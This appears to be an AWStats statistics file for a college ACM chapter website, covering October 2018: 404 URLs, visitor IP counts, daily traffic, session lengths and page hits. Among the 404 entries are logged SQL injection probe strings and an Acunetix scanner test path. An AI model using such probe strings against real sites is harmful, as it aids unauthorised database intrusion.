/-1%20OR%202%2b143-143-1=0%2b0%2b0%2b1.html 1 http://pccoe.hosting.acm.org/
/Cells/HIGHERSTUDIES.html 1 -
/images/gallery/a4@2x.jpg 24 http://pccoe.acm.org/
/anantya/assets/css/images/overlay.png 4 http://pccoe.acm.org/anantya/assets/css/main.css
/z5BQJf5T.html 1 http://pccoe.hosting.acm.org/
/css/fonts/ 208 http://www.google.com/search
/images/nss@2x.jpg 51 http://pccoe.acm.org/
/18-19Images/sports4@2x.jpg 27 http://pccoe.acm.org/
/www/ 1 -
/anantya/org.acm.pccoe.anantya2017/ads.txt 4 -
/images/abdul@2x.jpg 62 http://pccoe.acm.org/
/teachers-day/ 5 -
/about-us/ 2 -
/images/janhavi@2x.jpg 51 http://pccoe.acm.org/
/images/gallery/pcl1@2x.jpg 54 http://pccoe.acm.org/
/assets/images/members/Abhishek.jpg 1 -
/2015/07/ 1 -
/feed/ 14 -
/higher-studies/ 2 -
/assets/images/gallery/8.jpg 1 -
/pccoeacm%25'%20AND%202*3*8=6*8%20AND%20'u80z'!='u80z%25.html 1 http://pccoe.hosting.acm.org/
/acunetix-wvs-test-for-some-inexistent-file 1 -
/images/gallery/m6@2x.jpg 51 http://pccoe.acm.org/
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 375
162.254.252.104 300 300 19200 20181031222144
46.229.161.131 196 196 158153 20181031093930
127.0.0.1 188 188 914808 20181029171604
31.207.44.186 41 184 19370547 20181029171716
103.74.18.59 14 633 62470213 20181029061547
103.109.14.155 12 434 32836334 20181019120507
64.62.252.176 6 6 24960 20181031082013
94.23.45.37 5 5 20094 20181011163526
114.143.248.34 5 125 15689381 20181016043155
35.187.112.157 5 12 67536 20181021010725
158.69.124.228 5 5 176147 20181021174953
49.32.75.166 5 132 16523746 20181013041115
64.62.252.163 5 5 20216 20181023131101
66.160.140.183 4 4 15487 20181018152645
103.211.61.76 4 130 16419463 20181006105134
64.62.252.173 4 4 15472 20181028025916
66.160.140.187 4 4 15472 20181024082514
157.33.248.117 4 133 16434948 20181013003831
66.160.140.182 4 4 15487 20181018154534
149.202.215.219 4 4 15350 20181007170346
5.188.210.11 3 3 105482 20181019185833
51.158.20.250 3 3 107524 20181021083644
65.49.14.93 3 3 10606 20181008075543
106.77.10.198 3 125 15382755 20181010053708
14.139.239.74 3 134 16635272 20181013150926
157.36.197.97 0 2 46656 
2405:204:952c:6942:603d:3f6c:1b7a:5658 1 34 2144606 20181016163600
49.33.214.178 0 1 23328 
49.35.68.232 1 120 16953059 20181020081236
66.220.149.7 0 17 2329957 
149.129.145.91 0 1 640406 
54.160.116.179 2 2 9488 20181004091103
185.230.127.227 0 1 156455 
49.14.206.171 0 1 184648 
42.106.47.53 0 1 23328 
111.202.101.140 0 1 9171 
125.209.235.170 0 4 112543 
157.33.165.119 0 1 38158 
91.16.239.65 0 1 55993 
103.105.225.66 1 22 1066405 20181023002712
106.79.167.67 1 4 101604 20181020094109
47.91.239.89 1 1 35840 20181029115452
34.221.208.59 1 1 35840 20181025110343
1.187.209.19 0 1 92870 
157.34.110.226 0 1 67130 
49.248.83.105 1 115 15035636 20181012083956
27.57.241.82 0 1 14300 
213.230.78.155 1 41 2920121 20181007130823
115.119.252.226 1 6 473602 20181009144209
104.164.197.222 1 1 35840 20181026143349
108.178.61.60 1 1 4866 20181024081616
47.29.246.113 0 1 23328 
111.202.101.80 0 1 9171 
49.35.73.197 2 117 15040073 20181012080737
68.235.34.42 1 1 4744 20181014094336
184.154.47.5 1 1 4744 20181003202702
117.228.182.22 1 112 14536626 20181013045102
66.220.149.28 0 17 3856131 
115.153.150.127 1 1 34821 20181013062949
64.62.252.174 1 1 4866 20181020124700
54.176.79.77 1 1 4744 20181002123217
209.151.173.231 0 1 640406 
101.91.60.110 1 8 174412 20181013003035
157.33.173.67 0 2 369088 
157.33.130.212 1 117 16783945 20181025085635
106.213.222.77 0 1 23328 
47.247.111.241 0 1 23328 
185.244.217.155 1 1 4744 20181004153732
50.75.111.174 0 1 77660 
27.4.149.99 1 2 12660 20181017074851
106.78.177.67 0 20 2344189 
125.209.235.184 0 3 67557 
106.78.182.82 1 38 4466483 20181025084626
43.226.24.194 0 1 134941 
54.211.29.71 1 1 4866 20181022062116
106.77.35.185 0 1 43930 
42.109.232.8 0 1 274163 
49.15.3.19 1 49 6077141 20181024070058
182.73.250.178 1 47 4642651 20181024025038
106.77.42.214 1 111 13408629 20181013002934
125.209.235.181 0 3 486595 
220.243.136.103 0 1 1252 
27.145.127.80 1 3 31924 20181028023104
42.108.229.41 0 32 8097332 
75.66.136.229 0 1 91730 
117.232.210.236 1 116 15047422 20181013131023
162.158.65.172 0 1 25657 
37.48.124.212 1 1 34821 20181005110738
157.33.131.3 0 1 130127 
112.196.144.46 0 1 23328 
2407:8c00:ae:2855:4f70:b31c:c440:826e 2 36 2564344 20181025122547
47.29.19.187 0 1 62271 
185.92.73.107 1 1 0 20181020193227
54.212.122.205 1 1 34821 20181013175146
125.209.235.182 0 6 129232 
89.40.123.28 1 1 35840 20181031015239
125.209.235.183 0 4 269150 
106.213.208.76 0 1 62271 
64.233.172.174 0 1 125712 
173.176.161.136 0 1 92870 
2405:204:952a:96ca:2ee0:2473:75db:8330 2 145 17009504 20181013010941
185.191.204.13 1 1 4866 20181029031548
173.252.87.7 0 1 31 
203.90.94.224 0 92 13978010 
110.227.214.180 1 82 10982887 20181011070618
103.221.74.100 0 1 130127 
27.60.181.254 2 27 6494890 20181017020248
220.243.136.145 0 1 609 
117.240.173.116 0 1 25657 
144.76.113.20 0 1 23328 
106.79.160.200 0 4 107652 
52.162.213.79 1 15 94143 20181010203402
185.92.73.109 3 3 3145 20181014064342
157.49.254.93 1 7 269818 20181013024357
49.35.42.234 1 119 16791501 20181019131642
122.167.75.8 0 1 99213 
206.71.62.68 0 4 563436 
202.136.69.181 1 121 15488631 20181013002840
191.101.121.134 1 1 2717 20181020101843
27.97.143.220 1 2 12660 20181001021440
220.243.136.181 0 1 457 
59.95.192.184 1 117 16783945 20181025033411
192.0.101.66 1 114 15026755 20181003065731
59.95.195.43 0 71 12035527 
1.187.23.222 0 15 3617440 
45.61.185.245 1 1 35840 20181026175755
218.30.103.25 0 2 3252 
209.15.209.85 0 1 99213 
2405:204:91ac:18b2::812:50a5 1 46 3393674 20181010090559
220.243.136.116 0 5 32955 
103.86.183.232 0 2 51189 
65.49.14.167 1 1 4744 20181008071722
5.188.210.39 2 2 70661 20181024102043
103.51.95.151 1 22 1282302 20181022020709
203.199.154.134 0 1 130127 
103.86.182.217 1 117 15038001 20181002085803
66.220.149.19 0 18 2502192 
54.159.168.226 1 1 4744 20181004064541
2402:3a80:6c0:dee3:17e3:3d5d:3bdc:5fd6 1 115 15014017 20181005134736
2405:204:9383:9c78:47f9:7c49:9c55:33f4 1 18 1078321 20181014222816
195.154.23.124 1 1 4744 20181010224241
106.220.216.177 0 1 91730 
66.220.149.31 0 26 2812185 
49.35.244.100 0 5 386928 
5.188.211.14 1 1 34821 20181013033156
49.35.89.119 1 72 7382209 20181013010955
117.241.216.91 0 1 23328 
117.232.194.192 1 114 14464459 20181023102245
103.241.81.155 0 34 4053752 
157.49.238.241 0 1 92870 
54.211.193.188 1 1 4744 20181005061126
27.6.193.89 0 1 23328 
95.145.105.218 0 1 93883 
45.120.91.60 2 33 1697459 20181010014928
159.65.146.80 1 118 21551008 20181019023042
106.79.175.91 1 5 152091 20181001012906
220.243.136.79 0 1 609 
47.30.226.115 0 1 38158 
106.77.22.12 1 114 15026755 20181016133314
154.118.35.74 1 1 4866 20181022134016
49.35.7.170 1 1 4744 20181006051849
37.231.62.125 1 117 16783945 20181026164250
64.62.252.164 1 1 4744 20181011033150
1.23.195.8 1 117 15043192 20181002221334
192.157.88.165 0 1 50984 
157.49.183.255 0 7 211754 
125.209.235.180 0 5 826906 
125.209.235.179 2 7 40809 20181027212858
223.204.250.84 1 1 34821 20181014073534
103.21.127.60 1 117 16783945 20181026224228
92.253.88.94 0 1 25657 
106.79.187.81 0 4 144787 
220.243.136.175 0 1 18618 
185.63.254.37 3 3 105486 20181019055848
47.30.218.109 0 1 23328 
94.249.35.142 0 1 25657 
116.74.151.158 1 2 12741 20181020070306
54.145.158.178 2 2 7889 20181013065620
125.209.235.177 1 9 384813 20181006194352
123.126.113.117 0 1 5659 
103.108.74.148 0 1 130127 
125.209.235.174 0 5 212834 
122.168.164.23 1 117 16783945 20181020004638
125.209.235.171 0 2 93356 
5.188.211.16 1 1 34821 20181005100817
49.15.176.225 0 1 92870 
61.129.6.174 1 8 174412 20181013003035
125.209.235.175 1 10 493172 20181006194346
2402:3a80:c87:db24:c60:8f06:61f:f158 1 114 15006315 20181015230323
178.140.143.36 0 1 25657 
220.243.136.88 1 2 3174 20181012141542
2409:4042:2391:70f3:ee95:f27d:ff1e:1af7 1 117 14428033 20181016083316
47.247.146.35 0 1 41100 
148.251.237.246 1 1 35840 20181026204509
202.136.69.128 0 1 87114 
59.95.195.108 1 36 10842503 20181012232010
103.51.95.164 2 114 7819628 20181016084259
73.94.47.156 0 3 91848 
45.114.193.67 1 2 12660 20181018015401
14.140.181.44 0 1 62271 
95.28.165.34 0 1 25657 
106.78.175.206 1 25 1065182 20181018104704
202.136.69.216 0 24 3793887 
42.107.86.103 1 115 15035636 20181016200704
220.243.136.118 0 2 19892 
213.4.87.128 0 1 25657 
106.66.60.130 1 117 16783945 20181030200556
157.39.165.38 0 1 23328 
42.110.138.177 0 1 130127 
157.50.70.231 0 1 23328 
111.202.101.72 0 1 9171 
157.119.204.133 1 52 4264518 20181001123419
103.54.16.219 0 1 38158 
123.126.113.120 0 1 5659 
196.196.220.248 1 1 4866 20181020100812
106.79.183.131 0 4 117876 
157.33.200.18 0 9 949599 
2405:204:9482:db6b:34ab:9776:2395:c504 1 2 12660 20181009193106
220.243.136.86 1 1 4744 20181017215055
95.84.221.152 0 1 25657 
49.35.9.172 0 1 15070 
43.243.174.66 1 118 4744974 20181020001634
49.200.158.108 1 2 12660 20181013124122
111.200.39.123 1 1 4744 20181016084222
106.207.125.93 0 1 31200 
162.158.64.68 0 1 25657 
37.202.91.59 0 1 25657 
103.203.66.189 1 116 2889470 20181019104439
157.33.184.1 0 3 3950545 
106.193.234.196 1 42 2838430 20181017003618
125.209.235.185 0 4 246317 
125.209.235.176 0 3 74794 
84.201.17.39 1 1 4744 20181002190339
2409:4042:239b:9f38:c38b:fa6e:4543:5ca8 1 1 2321 20181002110411
220.243.136.163 0 6 34207 
1.187.13.49 0 4 175794 
183.87.42.40 1 116 16775064 20181020120654
106.77.61.169 0 1 87114 
111.202.101.114 0 1 5659 
103.215.148.64 0 113 15022011 
23.88.194.156 1 1 4866 20181026033155
103.49.241.129 1 117 3190427 20181013002702
106.79.177.212 0 4 107063 
213.137.86.126 1 1 4744 20181002032842
174.83.105.207 1 1 34821 20181004192637
117.195.86.109 1 105 9755448 20181016144603
157.33.177.180 2 27 6596064 20181012112922
118.186.244.206 0 2 86456 
139.5.240.102 0 1 23328 
47.9.90.30 0 1 23328 
66.37.84.15 0 1 25657 
162.158.64.166 0 1 25657 
49.14.121.0 0 1 130127 
125.209.235.169 1 2 5373 20181013231326
42.108.228.88 1 2 12741 20181023040126
122.169.107.103 0 1 23328 
49.14.91.48 0 4 115731 
117.228.87.253 0 1 23328 
190.117.65.221 1 2 13625 20181015165731
203.192.224.70 0 1 356940 
103.54.16.226 0 3 322253 
130.193.222.163 1 122 16949704 20181025133301
106.78.184.35 0 17 2100519 
106.210.254.182 1 2 8881 20181004120509
49.205.217.194 1 117 16783945 20181026032723
209.97.157.175 1 1 34821 20181009220916
2409:4042:231c:fc7d:e1e5:edc8:e511:47ad 1 30 1743909 20181015012950
157.39.190.49 0 1 15070 
66.220.149.30 0 18 2855176 
202.136.70.59 1 117 2908998 20181020083431
66.220.149.6 1 21 2428304 20181026051743
54.159.139.216 1 1 4866 20181027062339
103.226.201.28 0 1 23328 
37.105.146.236 0 2 185740 
197.58.247.187 0 1 198632 
106.79.97.201 0 1 369988 
106.78.161.57 0 25 6492541 
47.247.145.233 0 1 92870 
183.79.92.108 0 1 130127 
196.206.161.5 0 1 92870 
103.91.101.104 0 1 38158 
103.51.95.150 1 32 1610218 20181008050203
112.138.143.37 0 1 269549 
106.79.166.131 0 4 144242 
42.107.143.27 0 1 78331 
49.35.32.122 1 14 90260 20181023043101
112.79.161.27 0 1 23328 
125.209.235.172 0 1 82161 
106.120.173.149 0 1 38897 
2409:4042:2096:a81:7804:751c:f505:3ba0 1 2 12660 20181005010745
66.160.140.180 1 1 4881 20181019033812
45.120.62.139 0 1 23328 
106.79.189.4 0 3 172182 
69.251.15.184 0 1 125712 
117.239.40.146 1 117 16783945 20181031010452
192.243.53.51 2 2 9610 20181026084222
2401:4900:1882:64e4:1:1:5319:3c68 2 18 670046 20181020090433
103.84.81.98 3 133 11431682 20181022115700
47.9.179.224 1 102 9634224 20181017005019
162.158.65.176 0 1 25657 
42.109.15.195 0 1 224952 
121.46.87.41 0 1 23328 
106.79.173.245 0 3 133678 
42.108.232.178 0 2 264772 
115.113.181.23 0 1 130127 
106.193.183.248 1 60 4750369 20181013002850
88.99.27.172 2 2 70661 20181019144534
103.226.141.177 2 123 14637162 20181027222310
115.153.151.86 2 2 71680 20181031234148
195.22.22.25 1 1 4744 20181008153547
125.209.235.178 0 2 155465 
54.211.131.93 1 1 4744 20181005065018
220.243.136.85 0 4 34234 
106.220.81.90 1 1 4744 20181014112212
106.79.128.86 0 18 1555133 
45.77.2.91 1 1 4744 20181011214052
216.244.65.130 1 1 4866 20181031111510
104.236.158.24 1 1 0 20181022055155
220.243.136.149 0 5 35508 
45.114.195.67 2 94 7249810 20181003022325
54.159.241.212 1 1 4744 20181014061954
106.204.74.198 0 1 23328 
157.33.180.142 1 118 16923030 20181020141211
5.9.94.207 1 1 34821 20181005063140
117.232.230.200 1 106 14464136 20181025092051
54.165.90.203 1 1 34821 20181004023739
111.93.136.226 1 11 631054 20181023002710
66.249.82.155 0 1 234109 
125.209.235.173 0 1 43930 
220.243.136.180 1 1 4881 20181018214828
2405:204:952a:96ca:30e0:1e41:6586:d958 3 131 16423874 20181013070543
49.35.75.131 1 106 16701757 20181025061744
116.74.150.86 0 1 13065 
47.8.135.212 0 2 185740 
64.233.173.172 0 1 57770 
49.35.15.217 0 2 3310139 
136.233.8.97 0 1 77548 
37.59.53.164 0 3 69984 
103.109.13.155 2 33 1697459 20181024230441
223.190.60.100 0 1 23328 
182.58.96.230 0 1 99213 
104.161.30.194 1 1 4744 20181014192631
39.46.235.121 0 1 100119 
49.35.35.214 0 1 8881 
54.163.154.248 1 1 4744 20181013065740
1.187.7.59 0 3 212644 
5.196.54.215 1 1 4744 20181001164747
162.158.65.67 0 1 25657 
125.209.235.167 0 2 7284 
49.248.199.217 1 117 16783945 20181020010740
2402:3a80:c83:440a:d0f3:4597:3d89:3d7d 1 1 4866 20181022065030
117.223.88.46 0 1 23328 
123.252.208.208 0 2 410796 
157.33.153.44 1 122 16957890 20181020074053
187.132.53.97 1 1 35840 20181025135030
223.229.189.27 0 1 369988 
162.158.64.67 0 1 25657 
203.35.82.168 0 1 87114 
103.75.28.121 3 128 13508715 20181029144215
203.196.206.173 0 2 31064 
106.78.169.160 1 117 15103256 20181006130324
125.209.235.168 0 2 8651 
54.166.28.138 1 1 4744 20181013064834
198.20.3.193 0 1 130127 
125.209.235.186 1 1 4744 20181013231320
117.223.65.26 0 1 23328 
139.5.46.122 1 115 15035636 20181017043121
1.187.94.82 0 1 92870 
139.167.226.96 0 1 92870 
2402:3a80:c89:c9c6:d3bc:6c35:59fd:d162 1 88 8889774 20181022090719
66.249.84.243 0 1 78331 
62.210.157.10 2 2 70661 20181023101858
103.86.181.104 0 1 8881 
42.108.229.196 0 1 8881 
209.151.173.229 0 1 15532 
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20181001 17 104 6228566 8
20181002 18 258 30833582 9
20181003 24 367 39238921 7
20181004 18 23 285996 8
20181005 19 136 15353988 10
20181006 24 301 33851664 10
20181007 22 181 18122554 7
20181008 17 167 17038073 6
20181009 17 117 4829038 7
20181010 20 312 32939967 8
20181011 19 137 15245866 8
20181012 24 437 63006016 13
20181013 51 1480 165167701 28
20181014 24 58 2300302 12
20181015 18 165 17018373 7
20181016 24 629 65933939 14
20181017 22 320 34310695 12
20181018 31 399 42079769 14
20181019 23 581 49847760 12
20181020 30 1076 122258594 19
20181021 20 35 433628 6
20181022 21 296 30278532 10
20181023 21 182 16484143 10
20181024 19 145 12469955 9
20181025 58 879 115296805 14
20181026 20 491 71752461 11
20181027 17 165 16510653 6
20181028 51 172 5567028 6
20181029 236 510 34560148 7
20181030 47 167 17072897 4
20181031 52 170 16931657 8
END_DAY

# Session range - Number of visits
BEGIN_SESSION 5
15mn-30mn 2
2mn-5mn 7
30s-2mn 8
5mn-15mn 11
0s-30s 282
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 309
/ 646 3559500 265 247
/pccoeacm.html 30 81510 6 12
/acm.html 23 66045 2 6
/fonts/glyphicons-halflings-regular.woff2 13 231263 2 10
/esp.html 3 6306 0 1
/urop.html 3 6963 2 2
/anantya/ 3 8593 2 1
/cpanel 2 26548 1 0
/.well-known/acme-challenge/WPTKA0_Z-YK27UEOFJDF2FSVCHSKVTZP 1 64 0 0
/.well-known/acme-challenge/IFOZMREF4--NLS3M02J-3F7QU2YCS2-J 1 64 0 0
/.well-known/acme-challenge/QTA9IR7BEE7VFGLH0JA_8YNG45NWAVKS 1 64 0 0
/.well-known/acme-challenge/HKHYF017_RNT585NXWYMA_2_ZVB8XPIO 1 64 0 0
/.well-known/acme-challenge/96X1MBS0P5UI1CLEUZ7LWV41KLG8IVSZ 1 64 0 0
/.well-known/acme-challenge/A13XXFS-WZKKIX5ASG91MOQA66P1VP_U 1 64 0 0
/.well-known/acme-challenge/S95OGLTUWYUB-PXO_YHFQ7MFVEPOS8KH 1 64 0 0
/.well-known/acme-challenge/2SN09TTP4-DL5PKOXENIM4538CDAY0YE 1 64 1 0
/.well-known/acme-challenge/0UV1C53CB60OL4T3NUJ2RW98GPFQCR88 1 64 0 0
/.well-known/acme-challenge/447Z38L1M19YQY_49IHGZS2FRPQCQFWM 1 64 0 0
/.well-known/acme-challenge/7XYQJ7UOLVF8ORIAOABRUYSJB8U2W8UM 1 64 0 0
/.well-known/acme-challenge/47A8CPU025EN5OGSP-GZMDMXX82AWC_O 1 64 0 0
/.well-known/acme-challenge/LCHCX6ZZCUQFP-7I9WCA2L8PF0T7JTEB 1 64 0 0
/.well-known/acme-challenge/32NRQ6QWK2H-AFDMP8EG2C3W2J05OS1O 1 64 0 0
/.well-known/acme-challenge/49ZTM2J10EDHB6C4ZVRN7QJS1CVS3FDD 1 64 0 1
/.well-known/acme-challenge/V0FW6ZEIUVXU-D60QC1BLORISZ0H1KFB 1 64 0 0
/.well-known/acme-challenge/_TK-K95SZT_-OS3PIQSTUWVRP14ZTA0W 1 64 0 0
/.well-known/acme-challenge/WUR9SSB80OIPZHESM_34Z2A1FPZLRHDW 1 64 1 0
/.well-known/acme-challenge/6LQITCLQP2TYM0S-EZWSRVWOEEOPNMAW 1 64 0 0
/.well-known/acme-challenge/2_CU-HW_9A98S0ZXIDS69UQ0XFHGW872 1 64 0 0
/.well-known/acme-challenge/ZIPZVQ5T6U08EQQKBX96QN97804XF9IT 1 64 0 0
/.well-known/acme-challenge/1U-MYIN_P4_SLTAF__0-GQA6AGL9GJX5 1 64 0 0
/.well-known/acme-challenge/H5-XJC0_-I6-NIWTBRYAAAT2B7ADK46S 1 64 0 1
/.well-known/acme-challenge/XZJ5WTOUCL9WTU8_8W8CLC40QZ_91RGS 1 64 0 0
/.well-known/acme-challenge/CVKJ-NNWYP64W242KHPJCCGES2O7PONR 1 64 0 0
/.well-known/acme-challenge/JPY-VUZYPOTV2--7JHA5KGZXAN1E7QVS 1 64 0 0
/.well-known/acme-challenge/R21KLSEY3JK-X0I9I-CXYK5L4D50YOY8 1 64 0 0
/.well-known/acme-challenge/H5TVYQS5FWG4YDHJLW95FUR-57BB5U56 1 64 0 0
/.well-known/acme-challenge/QWT-JEQ3MYWQV639Z91MQJI4TUOLHNOP 1 64 0 0
/.well-known/acme-challenge/S82KQF5UUAOQMW42Z_OM2MJVSB2BX-W3 1 64 0 0
/.well-known/acme-challenge/YZ3SQIM-S09A45QP9953FLJ422OGYSA1 1 64 0 0
/.well-known/acme-challenge/JWH7FW1AB6-YUQOSG4KY-SV4Y4RGBWUY 1 64 0 0
/.well-known/acme-challenge/IR5GXZQ0CM5XTCQKVU2Q269FL-S_B702 1 64 0 0
/.well-known/acme-challenge/5FRJK9KGSBRRDVUXA_-2PETIH_DPN53J 1 64 0 0
/.well-known/acme-challenge/Z4DB5BJE4JRW4I8A2HIJVGHJWQYSP07V 1 64 0 0
/.well-known/acme-challenge/54-RD19IRBHKXE6SZ59NXIXHLK5CED-G 1 64 0 1
/.well-known/acme-challenge/AJJ4IEBQ_VRB1L9NK-3STJMU7AZP_EHV 1 64 0 0
/.well-known/acme-challenge/X76X1IU1DF27SJP5_9-K20OH8JERHOD2 1 64 0 0
/.well-known/acme-challenge/KS52EXIJ1H5ME08672JSO7AHFBLZVHYE 1 64 0 1
/.well-known/acme-challenge/J6UZZFSV481HXLKDJXGDZD7YV2XCPETV 1 64 0 0
/.well-known/acme-challenge/HA5NS3BZRUD388ER04LHCRXVOI19SQ1P 1 64 1 0
/.well-known/acme-challenge/-YKNDIH3KYPGD6DGBYD1Q1XSTCLP6DPZ 1 64 0 0
/.well-known/acme-challenge/8SWG8E55DPOF-Z5M1_ACIR6VQOKA65U_ 1 64 0 0
/.well-known/acme-challenge/7L2J5UJF-ES4KSCNP60IR86BKANT8NO8 1 64 1 0
/.well-known/acme-challenge/JUEHOC7V7_P-CCPANX5_4H0JUJMDN4CB 1 64 1 0
/.well-known/acme-challenge/3F8O4J_42_A_KQ_VYKDDZXMUH-7ZVRRT 1 64 0 1
/.well-known/acme-challenge/HP72XLBMSR7SSE1X2J4RTHP5W_E3CUKA 1 64 0 0
/.well-known/acme-challenge/-2IXEB1VSCA0OJ1AQOPOI1QLB_FHAR5D 1 64 0 0
/.well-known/acme-challenge/B-VFT4TGO6CKUG2FXR0905N5F4GF5N4S 1 64 1 0
/.well-known/acme-challenge/9IXMMHM693PS7J3HMDPBWZN3NFVIC43W 1 64 0 0
/.well-known/acme-challenge/259CYLJN164NUB4FZ94T5VN5HHKZV49Q 1 64 0 0
/.well-known/acme-challenge/4LMSG6MIZKPVIWSAC9E57BYEJDMPF94H 1 64 0 0
/.well-known/acme-challenge/EFEQ088LC0G4TW2ZU-ZDVTZHRRKFF5OG 1 64 0 0
/.well-known/acme-challenge/BRL2ZPA-6Y3RF36-ZRIGENI7FNM_1MAR 1 64 0 0
/.well-known/acme-challenge/N_3CKC0N3P-7KF3-QD_WOYL6XFN59MP3 1 64 0 0
/.well-known/acme-challenge/VZT0H6INXF-SY4I2FT0KRC1OPGL609WD 1 64 0 1
/anantya/assets/fonts/fontawesome-webfont.woff 1 90412 0 1
/.well-known/acme-challenge/SEL0JX9XDP8597QA4LFCB9GWREI95D1L 1 64 0 1
/.well-known/acme-challenge/_26CU_XRWATYC5IZI3-GUPUY6MRIFLO2 1 64 0 0
/.well-known/acme-challenge/833_YQ7EHE948XHP4XROH-WR46ZJLBQO 1 64 0 0
/.well-known/acme-challenge/27J75QUUSENBZK9X2H7P7GNQC6PXF7ZS 1 64 0 0
/.well-known/acme-challenge/43IK9150TBAOFFHFFD8VJ4FQ42GJ0LLB 1 64 0 0
/.well-known/acme-challenge/FTY4U9QBITPCFPOUM4FP2H8U9EL52OTJ 1 64 1 0
/.well-known/acme-challenge/HZUE1PRZ-1D4OIZTAZO87X6QJO2IO6VT 1 64 0 1
/.well-known/acme-challenge/ABGSEUQ58415A_P48DTAA05GL5_-IQ7Z 1 64 1 0
/.well-known/acme-challenge/YD2LF2_OZSL8O9IIFO_I0JQ7T6G2_BHF 1 64 0 0
/.well-known/acme-challenge/A0H6MR3UQYA23BMQZUE9QO_U6ZZSZ32T 1 64 0 0
/.well-known/acme-challenge/Z92_AURPXN_IUIT2SEN05IXRYR-UFZO7 1 64 0 0
/.well-known/acme-challenge/-S8HI19E-YDQTZFJ_N91HZ5O8J6GTGC9 1 64 1 0
/.well-known/acme-challenge/6C9JF07LWWU_Q2D2AH2QYIE7M9SWA9BU 1 64 0 0
/.well-known/acme-challenge/UXSRGQF8A4CG7SK-Q1G7MGOKP2_V131I 1 64 0 0
/.well-known/acme-challenge/E3T_8O3YOE9V7YUIB16E_U8D3491FHFZ 1 64 0 0
/.well-known/acme-challenge/27ZHD1WNIDTVJEULHSYTZA-HE_-NY4KB 1 64 0 0
/.well-known/acme-challenge/CQ9W1JURGXOCH3JM8FU2QDHNW0LTW-8S 1 64 0 0
/.well-known/acme-challenge/JTIR-1PZ2OBYPM28XOIRRJF90J3M3D4F 1 64 0 0
/.well-known/acme-challenge/3TV4IYBVVM4S_H5P498-KHH2G2B0D95U 1 64 0 0
/.well-known/acme-challenge/DVG95BNHR5YBNWVJ7VONMZKM_C8H6TXM 1 64 0 0
/.well-known/acme-challenge/XATQCF5Q05IXK-ZSB-WIMJIHGRKWSXF6 1 64 0 0
/.well-known/acme-challenge/CEL8_K6A4KHHL9PN1OCUUY1TZCZ_YR-F 1 64 1 0
/.well-known/acme-challenge/698FTV0ELXW4K8A3EH8NVM2OR6Z71Y5J 1 64 0 0
/.well-known/acme-challenge/38GPTJ42GTIZNHBUGFX4Q_4AZS4P4KWA 1 64 0 0
/.well-known/acme-challenge/7Y2AYFY-Y4QPQ0LDAB1RO43RYGOAAAMV 1 64 1 0
/.well-known/acme-challenge/93QEABIEHCAXN-RAFA_WZ6HTPABEXYGN 1 64 0 0
/.well-known/acme-challenge/II94X4LE4HG-KAFJR6EVP7PLUXX-ZJPD 1 64 0 0
/.well-known/acme-challenge/-QJI-VG8J3NJ60YTVJAP3AHEOHJM613B 1 64 0 0
/.well-known/acme-challenge/8KSQGH7I65TGXH02P8EFUPPT_X7EUC9N 1 64 0 0
/.well-known/acme-challenge/YPJLE9S936A96GAUPOZSKFHFOZ8L9HBD 1 64 0 0
/.well-known/acme-challenge/EZPN81LTONZGZ79ENEI9B32A2A5NJGAZ 1 64 0 0
/.well-known/acme-challenge/8BXXZ-66UMHOWYFDA1JDVP8RDEP_8-W3 1 64 0 0
/.well-known/acme-challenge/P_3S0YT1T9A-0GL-69DPXVNG9RUGCMI_ 1 64 0 1
/.well-known/acme-challenge/7_3Z97LFZ-_M194WSDTQCPSF-EI7VE_Q 1 64 0 0
/.well-known/acme-challenge/LU5B5KIP04L3SZ2AS3H5UL84D-FQ8ITY 1 64 0 1
/.well-known/acme-challenge/FICEN17HB13DDXIEN-0YKN79W5PFI6XC 1 64 1 0
/.well-known/acme-challenge/19W065Y_BTLIWL4PRGZLZXLGE2EQGKI8 1 64 0 0
/.well-known/acme-challenge/YX4GN1-17Q7H2S9HRRVVTT4F_3-D2Q7X 1 64 0 0
/.well-known/acme-challenge/0YWQPZMWC7D7F9W41I2EM2-KKH1Y6OHS 1 64 0 1
/.well-known/acme-challenge/T5L6IIT0IWFT_LTESROLFSF4KHP3972V 1 64 0 0
/.well-known/acme-challenge/NNXQG4_PHLQ3INIOY57XKU11MOLB-O43 1 64 0 0
/.well-known/acme-challenge/6VYXX7VX7LA2V9_RR9LVLGEM8L28RN37 1 64 1 0
/.well-known/acme-challenge/T1-W8LUD8LUTQCVWT-LH7ZW-VA7P7837 1 64 0 0
/.well-known/acme-challenge/-4UKN2AED23N-BNMYLU66PXBN-F0FNQ4 1 64 0 0
/.well-known/acme-challenge/K4O0IGJ5WKYOJL81RGO5LEEXRPGJVAYQ 1 64 0 0
/.well-known/acme-challenge/WBMA18EUY7XE0_G3I-29VYI98E1W1R9T 1 64 0 0
/.well-known/acme-challenge/MDA4Q12BDELJ5_CICN__M-3M2K2TFHGA 1 64 0 0
/.well-known/acme-challenge/S4KEVXDXMJHS7GQ2WSLPGS49CNGGX5VC 1 64 0 1
/.well-known/acme-challenge/BO86VJ87TMV51P-QV7F20_2S7BULKGO9 1 64 0 0
/.well-known/acme-challenge/E7SZSZ7T2G_PZ1PC9CGXF-UCPY1MZ57R 1 64 0 0
/.well-known/acme-challenge/AVPC5TIXLB1MK9FAM2KL_SYIV8TH86QM 1 64 0 0
/.well-known/acme-challenge/TGC-ZV0VU9MYCJ30UH3HFSUDVE-BTZ18 1 64 0 0
/.well-known/acme-challenge/-T7MF238QO0-DCTKB1JEZA56FLCOR9I- 1 64 0 0
/.well-known/acme-challenge/L-NSPHTYT_RM6R2O6Q77BK0SY04EOCQH 1 64 0 1
/.well-known/acme-challenge/DWNPTI1ME04WSAW89Z0R9N5URCBD_R10 1 64 0 0
/.well-known/acme-challenge/RO9ATSJQ8GZB1W9X8YDOXXFO99M1Q2_3 1 64 0 0
/.well-known/acme-challenge/P-8JZIULG96BG9NM0ZW5TEF1BCDLWCUI 1 64 0 0
/.well-known/acme-challenge/YD5RWV2VYHPUBOIX76R60EVXU9DLYBTB 1 64 0 0
/.well-known/acme-challenge/9H7Q7LZSV55987LCKI8IWC33RRDOERWV 1 64 0 0
/.well-known/acme-challenge/-PKLOSUPREH6_OD3TUQCTR24R-FEYHLN 1 64 0 0
